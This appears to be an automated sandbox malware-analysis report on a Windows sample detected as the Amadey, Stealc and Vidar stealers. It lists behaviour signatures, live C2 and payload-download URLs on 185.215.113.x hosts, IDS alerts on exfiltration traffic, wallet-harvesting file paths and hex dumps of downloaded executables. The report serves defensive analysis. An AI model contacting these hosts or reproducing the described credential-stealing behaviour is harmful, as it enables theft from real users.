Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1502390
MD5: d2d35997021550d304bf21a670921efe
SHA1: 974ed61752963812b1005e85d5077e43b00afc6b
SHA256: 5da8190ffd2e3bfbc685b9de6e326eefe60be0b51a5be2ea38634e45287ccfbc
Tags: exe
Infos:

Detection

Amadey, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
Maps a DLL or memory area into another process
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.100/0d60be0de163924d/vcruntime140.dll URL Reputation: Label: malware
Source: http://185.215.113.100/ URL Reputation: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/mozglue.dll URL Reputation: Label: malware
Source: http://185.215.113.100 URL Reputation: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/sqlite3.dll URL Reputation: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/nss3.dll URL Reputation: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php URL Reputation: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/softokn3.dll URL Reputation: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/freebl3.dll URL Reputation: Label: malware
Source: http://185.215.113.19/Vi9leo/index.phpHarddiskVolumef Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/e2b1563c6670f193.phpion: Avira URL Cloud: Label: malware
Source: http://185.215.113.100/ZkRm Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/nss3.dllllo Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/msvcp140.dllP Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/nss3.dll5 Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/nss3.dllK Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.phpAppDataB$ Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/e2b1563c6670f193.phprowser Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.php Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/0d60be0de163924d/nss3.dllY Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpmainnet Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/nss3.dllllG Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpm& Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.php26 Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/0d60be0de163924d/nss3.dllll9 Avira URL Cloud: Label: malware
Source: http://185.215.113.100/ws Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.phpppData Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/e2b1563c6670f193.phprofiles Avira URL Cloud: Label: malware
Source: http://185.215.113.16/well/random.exe Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpDq Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php/ Avira URL Cloud: Label: malware
Source: http://185.215.113.19/ Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/e2b1563c6670f193.php2 Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpDu Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php3 Avira URL Cloud: Label: malware
Source: http://185.215.113.16/steam/random.exeBH Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/0d60be0de163924d/vcruntime140.dlld Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php# Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpAECGHCBGCBFHIIDHI$3 Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.php53001 Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/ocal Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.phpQ Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/0d60be0de163924d/freebl3.dlla Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.phpT Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/0d60be0de163924d/mozglue.dllk Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.phpL Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phptch Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phps Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/e2b1563c6670f193.phpM Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.phpz Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/0d60be0de163924d/softokn3.dllA Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpU Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpA Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpE36 Avira URL Cloud: Label: malware
Source: http://185.215.113.19/fae1daa8e9eb0eefeb8846d934f48b15eaa495c49# Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php3001 Avira URL Cloud: Label: phishing
Found malware configuration
Source: 00000008.00000002.2653239563.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.100/e2b1563c6670f193.php"}
Source: explorti.exe.7692.6.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}
Multi AV Scanner detection for domain / URL
Source: http://185.215.113.100/e2b1563c6670f193.phpion: Virustotal: Detection: 6% Perma Link
Source: http://185.215.113.100/0d60be0de163924d/msvcp140.dllP Virustotal: Detection: 18% Perma Link
Source: http://185.215.113.100/0d60be0de163924d/nss3.dllK Virustotal: Detection: 18% Perma Link
Source: http://185.215.113.100/0d60be0de163924d/nss3.dll5 Virustotal: Detection: 15% Perma Link
Source: http://185.215.113.100/e2b1563c6670f193.phprowser Virustotal: Detection: 10% Perma Link
Source: http://185.215.113.19/Vi9leo/index.php Virustotal: Detection: 24% Perma Link
Source: http://185.215.113.100/0d60be0de163924d/nss3.dllY Virustotal: Detection: 14% Perma Link
Source: http://185.215.113.100/ws Virustotal: Detection: 7% Perma Link
Source: http://185.215.113.19/Vi9leo/index.phpppData Virustotal: Detection: 19% Perma Link
Source: http://185.215.113.16/well/random.exe Virustotal: Detection: 25% Perma Link
Source: http://185.215.113.19/ Virustotal: Detection: 18% Perma Link
Source: http://185.215.113.100/e2b1563c6670f193.php/ Virustotal: Detection: 7% Perma Link
Source: http://185.215.113.100/e2b1563c6670f193.php2 Virustotal: Detection: 10% Perma Link
Source: http://185.215.113.100/e2b1563c6670f193.php3 Virustotal: Detection: 7% Perma Link
Multi AV Scanner detection for submitted file
Source: file.exe Virustotal: Detection: 56% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8E6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 7_2_6C8E6C80
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA3A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 7_2_6CA3A9A0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA344C0 PK11_PubEncrypt, 7_2_6CA344C0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA04420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 7_2_6CA04420
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA34440 PK11_PrivDecrypt, 7_2_6CA34440
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA825B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 7_2_6CA825B0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA1E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 7_2_6CA1E6E0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA18670 PK11_ExportEncryptedPrivKeyInfo, 7_2_6CA18670
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA3A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 7_2_6CA3A650
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA5A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError, 7_2_6CA5A730
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA60180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util, 7_2_6CA60180
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA343B0 PK11_PubEncryptPKCS1,PR_SetError, 7_2_6CA343B0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA57C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util, 7_2_6CA57C00
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA5BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy, 7_2_6CA5BD30
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA17D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey, 7_2_6CA17D60
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA59EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo, 7_2_6CA59EC0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA33FF0 PK11_PrivDecryptPKCS1, 7_2_6CA33FF0
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: eb98fe5174.exe, 00000007.00000002.2669122689.000000006C94D000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.7.dr, mozglue[1].dll.7.dr
Source: Binary string: freebl3.pdb source: freebl3.dll.7.dr, freebl3[1].dll.7.dr
Source: Binary string: freebl3.pdbp source: freebl3.dll.7.dr, freebl3[1].dll.7.dr
Source: Binary string: nss3.pdb@ source: eb98fe5174.exe, 00000007.00000002.2670979145.000000006CB0F000.00000002.00000001.01000000.0000000E.sdmp, nss3[1].dll.7.dr, nss3.dll.7.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.7.dr, softokn3.dll.7.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.7.dr, vcruntime140[1].dll.7.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.7.dr, msvcp140[1].dll.7.dr
Source: Binary string: nss3.pdb source: eb98fe5174.exe, 00000007.00000002.2670979145.000000006CB0F000.00000002.00000001.01000000.0000000E.sdmp, nss3[1].dll.7.dr, nss3.dll.7.dr
Source: Binary string: mozglue.pdb source: eb98fe5174.exe, 00000007.00000002.2669122689.000000006C94D000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.7.dr, mozglue[1].dll.7.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.7.dr, softokn3.dll.7.dr
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49737 -> 185.215.113.19:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.19:80 -> 192.168.2.4:49737
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49739 -> 185.215.113.19:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49742 -> 185.215.113.100:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49741 -> 185.215.113.19:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49742 -> 185.215.113.100:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.100:80 -> 192.168.2.4:49742
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49742 -> 185.215.113.100:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.100:80 -> 192.168.2.4:49742
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49742 -> 185.215.113.100:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49744 -> 185.215.113.19:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49796 -> 185.215.113.100:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.100/e2b1563c6670f193.php
Source: Malware configuration extractor IPs: 185.215.113.19
Detected non-DNS traffic on DNS port
Source: global traffic TCP traffic: 192.168.2.4:52614 -> 1.1.1.1:53
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 01 Sep 2024 03:09:06 GMTContent-Type: application/octet-streamContent-Length: 1771008Last-Modified: Sun, 01 Sep 2024 01:45:41 GMTConnection: keep-aliveETag: "66d3c745-1b0600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4d 8b c8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 00 30 67 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 67 00 00 04 00 00 d3 4f 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 f0 23 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 23 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 23 00 00 10 00 00 00 3c 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 e0 23 00 00 00 00 00 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 23 00 00 02 00 00 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 90 29 00 00 00 24 00 00 02 00 00 00 4e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 6c 61 66 6c 64 78 71 00 90 19 00 00 90 4d 00 00 8e 19 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 67 6d 77 6c 74 68 75 00 10 00 00 00 20 67 00 00 06 00 00 00 de 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 67 00 00 22 00 00 00 e4 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 01 Sep 2024 03:09:13 GMTContent-Type: application/octet-streamContent-Length: 917504Last-Modified: Sun, 01 Sep 2024 03:01:38 GMTConnection: keep-aliveETag: "66d3d912-e0000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0a d9 d3 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 50 04 00 00 00 00 00 77 05 02 